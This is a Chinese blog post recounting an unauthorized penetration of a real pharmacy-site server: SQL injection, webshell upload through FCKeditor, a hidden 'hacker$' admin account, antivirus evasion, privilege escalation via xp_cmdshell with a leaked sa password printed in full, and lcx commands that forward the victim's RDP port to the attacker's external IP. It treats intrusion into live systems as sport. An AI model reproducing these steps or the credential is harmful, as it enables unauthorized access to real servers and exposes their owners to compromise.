一次超级蛋疼的渗透
前幾天俺認識了一個刷鉆的我是傻逼,后來在我的威逼利誘下,他放棄了刷鉆行業,并且他交出了他所在的平臺的帳號密碼。登陸后發現里面有錢錢~不過只有18.25元,于是我果斷的截圖并涂掉了中間的小數點。當我把截圖發在九區基友群里,一群我是傻逼就激動了。于是,俺和羽翼決定日掉這個猥瑣的平臺。
俺們就直接c段了…..
兩個人分工,我從前面開搞。反正是c段,找到最簡單就行。但是我們無比蛋疼蛋疼無比,幾乎每個ip上都是同一類型的站一堆,而且是各種系統各種環境。最開始的時候羽翼發現了一個ecshop 2.7.2,按理說是有洞洞可用的,不過俺是失敗了,沒辦法,俺是菜鳥啊~
經過一段時間查找,俺們盯上了一個IP,上面的站點都是一套叫“醫藥無憂”的程序,asp+mssql。
發現注入:http:// www.2cto.com /news_detail_all.asp?id=19180作為懶人俺們就直接上工具了,但是某些工具還是不給力,最后出動了safe3的注入檢測工具才弄到MD5。
后臺?http://www.2cto.com /Admin/Admin_index.asp
后臺太tmd郁悶,上傳那里自動重命名了,也沒別的功能,果斷陷入僵局。然后我發現了該網站8080端口也有一個網站,菜刀給力啊~發現登陸頁面,用剛才80端口上的網站密碼登陸,成功~
當然,也有fck編輯器的目錄現身,但是還得找exp去看看,我很懶的,還是去后臺登陸了。但是經過折騰,只有公告發布的地方有個上傳,但是得選擇會員發送,而選擇會員那里有點問題,怎么也選不上,于是我又回到了fck….
傳馬,無壓力,拿到webshell。然后我就出去吃飯了,等我回來的時候已經看到用戶組里有了hacker$,問之,原來用了某神器成功添加帳戶。
但是,3389連上不。羽翼說是防火墻設置了允許3389登陸的IP段,我果斷反對啊。因為c段里所有服務器的系統和環境都不一樣,應該都是獨立服務器,而這臺服務器根據一路入侵過來的經驗來看,管理員應該是沒有什么安全常識的,那么他怎么會想到限制登陸IP段呢。好吧,羽翼被我說服了~~~~服務器上有麥咖啡和360,很多東西都被殺,于是羽翼找人做免殺,但是要等到第二天。然后砍少同學迅速的發現了SQL密碼,但是改掉了。然后我們轉向了LOL陣地,擼了一把后繼續來日。
我提出,www.qzyy.net.cn服務器上的站都是www.yy5u.com開發的,而兩個站不在一個ip上,可能另外一臺可以3389,但是經過嘗試,c段中幾乎沒有可以3389連接的。說明c段是一個idc管理的,所有3389都被禁用或者改端口什么的。然而我又想不明白的是,這樣的話idc就只能賣虛擬空間,但是www.qzyy.net.cn卻在8080端口有另一個網站來銜接,這讓人很不解啊。不過既然每個IP都無法3389訪問,我就不用去再拿一個c段IP來提權了,只能等羽翼的免殺,然后我又不甘心的一個人試著提了好久。
Aspx馬兒傳上去就被殺,只有砍少那貨傳了倆編碼有問題的馬兒沒被殺,難道殺軟對編碼也有要求?恍惚間看見了VNC,一般VNC密碼都在注冊表,但是我怎么讀都沒找到password這個鍵。
?
再一次蛋碎啊。某大牛讓我lcx連接或者nc反彈本地,不過時間已經過了十二點了,俺得先休息了。
早上六點多爬起來繼續研究,因為該服務器上掛了有十幾個網站,其中有一個沒有運行的discuz?NT,在它的配置文件中找到了sa密碼yy5u1357924680。
然而注冊表里鍵值顯示3389是開啟的且端口未被改動,某大牛說是策略組或者防火墻的功勞。策略組我覺得不大可能,因為這個管理員應該不會那么聰明,而進程里確實看到了firewall。在E盤software文件夾里看到了服務器上安裝的一些軟件的安裝包,確定了vnc版本是4.2.9,并且有一個系統鏡像備份,如果把這個鏡像下載下來弄虛擬機安裝上,在用前段日子出的直接讀系統密碼的神器,應該就可以獲得管理員密碼,但是現在對我來說管理員密碼并不重要。
后來,放了兩天,繼續滲透。通過sa用戶,用分離器連接,修復xp_cmdshell,成功提權。
然后用lcx轉發端口:
本地:
lcx -listen 51 2008
webshell:
設置cmd路徑
setp D:\Web\NetSrvWeb\upfiles\image\cmd.exe
轉發3389端口
D:\Web\NetSrvWeb\upfiles\image\lcx -slave 本地外網IP 51 127.0.0.1 3389在webshell上執行會出現假死,屬于正常情況
成功連接3389。由于自己在網吧,沒有時間內網滲透,下次繼續
作者:kylin 首發:www.dis9.com
總結
- 上一篇: WebForms 开发基础
- 下一篇: 【N版】openstack——认证服务k